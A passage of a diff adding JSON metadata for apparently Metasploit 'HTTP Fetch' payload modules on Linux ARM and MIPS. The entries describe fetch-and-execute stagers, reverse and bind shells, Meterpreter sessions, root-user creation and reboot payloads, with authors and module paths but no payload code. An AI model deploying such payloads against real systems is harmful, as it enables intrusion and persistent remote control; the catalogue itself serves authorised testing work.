[], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/armbe/shell_bind_tcp": { + "name": "HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/armbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Balazs Bucsay @xoreipeip " + ], + "description": "Fetch and execute an ARMBE payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armbe", + "adapted_refname": "linux/armbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/armle/adduser": { + "name": "HTTP Fetch, Linux Add User", + "fullname": "payload/cmd/linux/http/armle/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/adduser", + "staged": false + }, + "payload_cmd/linux/http/armle/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/armle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nExecute an arbitrary command", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/exec", + "staged": false + }, + "payload_cmd/linux/http/armle/meterpreter/bind_tcp": { + "name": "HTTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/armle/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/http/armle/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/armle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/http/armle/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/armle/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/armle/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/armle/shell/bind_tcp": { + "name": "HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/http/armle/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/http/armle/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ", + "hal" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect to target and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/armle/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mips64/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/mips64/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/mips64/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/mipsbe/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/exec", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/meterpreter", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/http/mipsbe/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/reboot": { + "name": "HTTP Fetch, Linux Reboot", + "fullname": "payload/cmd/linux/http/mipsbe/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "rigan - " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/reboot", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/mipsbe/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsbe/shell", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_cmd/linux/http/mipsbe/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/mipsbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsbe/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/mipsbe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "rigan ", + "juan vazquez " + ], + "description": "Fetch and execute an MIPSBE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [ + "EDB-18226" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsbe/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsbe", + "adapted_refname": "linux/mipsbe/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mipsle/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/mipsle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Michael Messner ", + "entropy " + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/exec", + "staged": false + }, + "payload_cmd/linux/http/mipsle/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/mipsle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/mipsle/meterpreter", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_cmd/linux/http/mipsle/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/mipsle/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an MIPSLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mipsle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mipsle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mipsle", + "adapted_refname": "linux/mipsle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/mipsle/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mipsle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": 